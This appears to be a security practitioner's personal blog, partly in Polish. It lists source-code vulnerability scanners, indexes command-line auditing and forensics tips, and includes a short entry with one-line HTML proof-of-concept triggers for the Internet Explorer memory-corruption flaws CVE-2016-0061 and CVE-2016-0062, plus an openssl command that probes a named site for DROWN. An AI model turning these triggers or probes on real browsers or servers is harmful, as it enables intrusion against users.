Skaner podatności kodu

10 July 2018

analizator kodu źródłowego:

sonarqube ???

https://www.blackhat.com/docs/us-15/materials/us-15-Cornell-ThreadFix.pdf

Open Source or Free Tools

    Bandit - bandit is a comprehensive source vulnerability scanner for Python
    Brakeman - Brakeman is an open source vulnerability scanner specifically designed for Ruby on Rails applications
    Codesake Dawn - Codesake Dawn is an open source security source code analyzer designed for Sinatra, Padrino for Ruby on Rails applications. It also works on non-web applications written in Ruby
    FindBugs - Find Bugs (including a few security flaws) in Java programs
    FindSecBugs - A security specific plugin for FingBugs that significantly improves FindBug's ability to find security vulnerabilities in Java programs
    Flawfinder Flawfinder - Scans C and C++
    Google CodeSearchDiggity - Uses Google Code Search to identifies vulnerabilities in open source code projects hosted by Google Code, MS CodePlex, SourceForge, Github, and more. The tool comes with over 130 default searches that identify SQL injection, cross-site scripting (XSS), insecure remote and local file includes, hard-coded passwords, and much more. Essentially, Google CodeSearchDiggity provides a source code security analysis of nearly every single open source code project in existence – simultaneously.
    Graudit - Scans multiple languages for various security flaws.
    PMD - PMD scans Java source code and looks for potential code problems (this is a code quality tool that does not focus on security issues)
    Progpilot - Progpilot is a static analyzer tool for PHP that detects security vulnerabilities such as XSS and SQL Injection.
    PreFast (Microsoft) - PREfast is a static analysis tool that identifies defects in C/C++ programs. Last update 2006.
    Puma Scan - Puma Scan is a .NET C# open source static source code analyzer that runs as an IDE plugin for Visual Studio and via MSBuild in CI pipelines.
    .NET Security Guard - Roslyn analyzers that aim to help security audits on .NET applications. It will find SQL injections, LDAP injections, XXE, cryptography weakness, XSS and more.
    RIPS - RIPS is a static source code analyzer for vulnerabilities in PHP web applications. Please see notes on the sourceforge.net site.
    phpcs-security-audit - phpcs-security-audit is a set of PHP_CodeSniffer rules that finds flaws or weaknesses related to security in PHP and its popular CMS or frameworks. It currently has core PHP rules as well as Drupal 7 specific rules.
    SonarQube - Scans source code for more than 20 languages for Bugs, Vulnerabilities, and Code Smells. SonarQube IDE plugins for Eclipse, Visual Studio, and IntelliJ provided by SonarLint.
    VisualCodeGrepper (VCG) - Scans C/C++, C#, VB, PHP, Java, and PL/SQL for security issues and for comments which may indicate defective code. The config files can be used to carry out additional checks for banned functions or functions which commonly cause security issues.
    Xanitizer - Scans Java for security vulnerabilities, mainly via taint analysis. The tool comes with a number of predefined vulnerability detectors which can additionally be extended by the user. It's free for academic and open source projects (see [1]).

Commercial

    AppScan Source (IBM)
    BlueClosure BC Detect (BlueClosure)
    bugScout (Buguroo Offensive Security) Latest generation source code analysis tool bugScout detects source code vulnerabilities and makes possible an accurate management of the life cycles due to its easy use.
    CAST AIP (CAST) Performs static and architectural analysis to check for: SQL Injection, Cross Site Scripting (XSS), Input Validation,  Insecure Cryptographic Storage, Information Leakage and Improper Error Handling, Data Access, API Abuse, Encapsulation on over 30 languages.
    Codacy is free for open source projects, and integrates with tools such as Brakeman, Bandit, FindBugs, and a number of others. It offers security patterns for languages such as Python, Ruby, Scala, Java, Javascript and more.
    Contrast from Contrast Security Contrast performs code security without actually doing static analysis. Contrast does Interactive Application Security Testing (IAST), correlating runtime code & data analysis. It provides code level results without actually relying on static analysis.
    Coverity Code Advisor (Synopsys)
    CxSAST (Checkmarx)
    Fortify (HP)
    Julia - SaaS Java static analysis (JuliaSoft)
    KlocWork (KlocWork)
    Kiuwan - SaaS Software Quality & Security Analysis (an Optimyth company)
    Parasoft Test (Parasoft)
    PVS-Studio (PVS-Studio) For C/C++, C#
    Puma Scan Professional - Puma Scan Professional is a .NET C# static source code analyzer that runs as an IDE plugin for Visual Studio and via MSBuild in CI pipelines.
    RIPS Code Analysis (RIPS Technologies) - RIPS is a SAST solution specialized for PHP that detects unknown security vulnerabilities and code quality issues. It can be easily integrated into the SDLC and supports various industry standards.
    SecureAssist (Synopsys) - Prevent insecure coding and configurations (Java, .NET, PHP, and JavaScript) by scanning code automatically as an IDE plugin for Eclipse, IntelliJ, and Visual Studio etc. The guidance for fixing insecure coding contains references to OWASP resources.
    Sentinel Source (Whitehat)
    Seeker (Synopsys) Seeker performs code security without actually doing static analysis. Seeker does Interactive Application Security Testing (IAST), correlating runtime code & data analysis with simulated attacks. It provides code level results without actually relying on static analysis.
    Source Patrol (Pentest)
    Veracode Static Analysis (Veracode)
    Xanitizer - Scans Java for security vulnerabilities, mainly via taint analysis.

Source: https://www.owasp.org/index.php/Source_Code_Analysis_Tools

Command Line Kung Fu

14 March 2017

source: http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html

Auditing

The Advantage of "sort" to View Passwords
Avoiding LANMAN False Positives
"chage" to Get/Set Password Security Parameters
Change a User's Password to Blank
Find Accounts With Superuser Privileges
Finding Duplicate User IDs
Finding Null Passwords
Lock Out Users Remotely While Preserving Session
Lock Screen With "tsdiscon"
"net use" and The Blank Passwords
Show Account Security Settings
Show Domain-Wide Settings For Accounts
Suspicious Password Entries
Why "wmic" Remote Lock Fails?
"wmic" to Display Users' SID
Workaround to View Windows Password Hashes


Forensics

Better "find" with touch
Determine where a USB device was plugged into
Display File Creation Time
Listing Files by Inode as a Proxy for Creation Time
Remotely Pull USB info
Show USB vendor/serial number 
USB History
Watch File Count in a Directory

Network Troubleshooting

Hack to Pull Out a Specific Protocol From "netstat" Output (Linux)
Kill Process by TCP/UDP port number
Learn About Network Traffic
"netstat" vs "lsof"
Protocol Stats
"watch" vs "netstat -c" 

Penetration Testing

The Broadcast Ping
Command-Line Ping Sweeper
Detecting when a scan reaches a given target
Firewall Chains
Look at Firewall Configs
Reverse DNS Records
See the Number of Times a Firewall Rule Was Triggered
Show Ports Allowed Through Firewall
Show Programs Allowed Through Firewall
Speed Up Ping


System Administration


Aborting a System Shutdown
Browsing the Registry with Powershell  
Careful with iptables "INPUT"
Converting Unix timestamps to human-readable form 
Disable The Guest Account 
Dropping Firewall Dead
Execute a Command En Mass
"find ...| xargs ..." vs "find ... -exec ..."
"findstr /m" to Print Only File Name
Find Files That Only Contain Printable ASCII With "findstr /p" (But be Aware)
Finding Names of Files Matching a String
Having Fun with Firewall
The Importance of Putting Your System's Hostname
IPTables or The Simplified Firewall Configuration
Linking Files
Listing Files and Their Sizes
Listing the largest 100 files
Poke Holes Through The Firewall
Reboot in [N] Seconds
Remote Command Execution
Simplify Your Life With "ufw"
SSH: Using "user@host" vs "-l" 
Symlink to an Entire Directory
What is hogging up the space?
WScript to Create Link For Files and Folders

Text Manipulation

Backup Before You Change With "sed"
Build Your Own "uniq" Command on Windows
Convert Multiple-Line Output into a Single Line Using "tr"
Convert Text Formats - Dos to Unix
Extra Little File to Help
"for" loops to parse text
Have "sed" Use Extended Regular Expressions
Replacing Strings in Multiple Files
Replacing Text Powershell Way
The Single Quote, The Double Quote, and The "FOR" Loop
When "sed" is better than "awk"

 

Metasploit Joseph McCray

20 March 2016

decompile / bug bounty of manufacturer firmware

13 March 2016

GIAC - GREM

6 March 2016

default dll used by powerpoint

4 March 2016

Check DROWN of attack possibility

3 March 2016

openssl s_client -ssl2 -connect wodzinski.waw.pl:443

https://drownattack.com/

Blind SQL injections

16 February 2016

Internet Explorer Exploit

12 February 2016

CVE-2016-0061:

 

<meta http-equiv=X-UA-Compatible content=IE=7><form id="&;&;"><body onload=opener?opener["\u4141\u4141"]():open("?")>

Vulnerability Severity Ratings and Impact

CVE number

Vulnerability title

Internet Explorer 9

Internet Explorer 10

Internet Explorer 11

Internet Explorer 11
on Windows 10

CVE-2016-0061

Microsoft Browser Memory Corruption Vulnerability

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

 

CVE-2016-0062

https://technet.microsoft.com/en-us/library/security/ms16-009.aspx

<body onload=open("2.html")>

Vulnerability Severity Ratings and Impact

Vulnerability title

Internet Explorer 9

Internet Explorer 10

Internet Explorer 11

Internet Explorer 11
on Windows 10

CVE-2016-0062

Microsoft Browser Memory Corruption Vulnerability

Not applicable

Not applicable

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

 

Protection of system security

3 November 2015